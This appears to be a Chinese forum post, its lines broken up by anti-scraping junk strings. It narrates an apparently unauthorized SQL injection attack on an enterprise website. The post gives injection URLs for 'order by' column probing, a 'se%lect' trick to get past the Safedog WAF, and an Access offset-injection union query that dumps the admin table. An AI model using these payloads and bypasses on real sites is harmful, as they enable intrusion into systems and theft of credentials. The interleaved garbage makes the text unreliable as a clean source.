打开网站,一个企业站。
+ ]" S# c& [$ @
" e# p/ C' h8 k& u, k
, U& ]. [! ]) }0 ]1 i5 b9 H N顺手加个admin
+ f# o2 T+ z9 z+ q, l
# @0 N; g' V1 L6 x5 ~. Q; z( B/ b/ I9 M" \0 }
默认后台。
/ F2 e9 H) F& z6 l8 N3 E" E6 @回到首页点开个产点连接在参数后面加上:and 1=1,发现有狗。
' A* l4 _/ P- ]
: P4 v, V. z5 _' h
: K0 | o7 t6 l+ s5 P* ?' |/ k* y* J8 X" Z
所以就不用御剑扫了,待会直接封IP。# r+ |7 \' r9 T. f$ e2 Q
5 U* z/ x4 M, U( C0 z% R0 e) n! i用order by语句判断是否存在注入。2 p" P8 q Y( h, G1 S$ U5 L
http://www.xxx.com /product_show.asp?id=997 order by 16 ?' x s; I8 B( a, |
http://www.xxx.com /product_show.asp?id=997 order by 1008 Z! M+ ^# \8 i: w
现在存在注入,经测试后发现是9个字段。
) a9 p/ `' m3 @6 ]6 a M, d
# u/ I- g5 h$ [$ R: w, |( i+ C! u接下来进行联合查询,猜是否存在admin表。
+ w# A$ F0 A6 H( H. n" K2 r) fhttp://www.xxx.com /product_show.asp?id=997+union+select+1,2,3,4,5,6,7,8+from+admin 被狗拦截。5 }. {, Q1 \, e6 p" |0 D c+ |
# {4 q4 j( N5 w2 D& W: N
0 n4 B: h" n. H
# [6 p2 I, Y% `; L; z
在select中间加个%,se%lect绕过安全狗。
O/ F, \8 n e6 P" t, D6 i: b+ }! Z1 j N% M
' s! J v" I# ]0 i- Z9 m
发现存在admin表,然后开始手工猜常用的字段。
% M9 P( Z7 m" p) W! l8 m纠结的是手工把常用的字段都猜遍了,也没猜到一个字段。陷入迷茫中。+ C! t1 u4 Q( F& {) \- j6 H
# q1 |9 ]. Y. v8 _4 S
突然想起之前看到的一篇关于access偏移注入的文章,文章就是说在注入猜不到字段时可以尝试一下这个方法,之前我特地去测试过这种方法,但是爆不出来,也没太在意。现在也只能试一下这种方法,拼一下人品了。
0 B) f0 Q2 `# U0 o% ]4 x
6 ^: l$ _- B0 g$ ?: B1 _9 \- n科普知识就不讲了,如果有不懂的可以加我Q:519582321 一起交流,有深圳的基友也可以加一起搞基情。( U+ @" P; ] W' s
http://www.xxx.com /product_show.asp?id=997+union+s%elect+1,2,3,4,5,* from+admin; |5 ]: t! s0 o) u
好了,敏感内容出显了。1 z1 o5 Z& }$ ]3 ]6 U9 c$ f, s3 Y
; C# U* q a* L) @ t
, o' a, X# C$ @: y3 K
. M# _" P0 ]" Q" F. g
|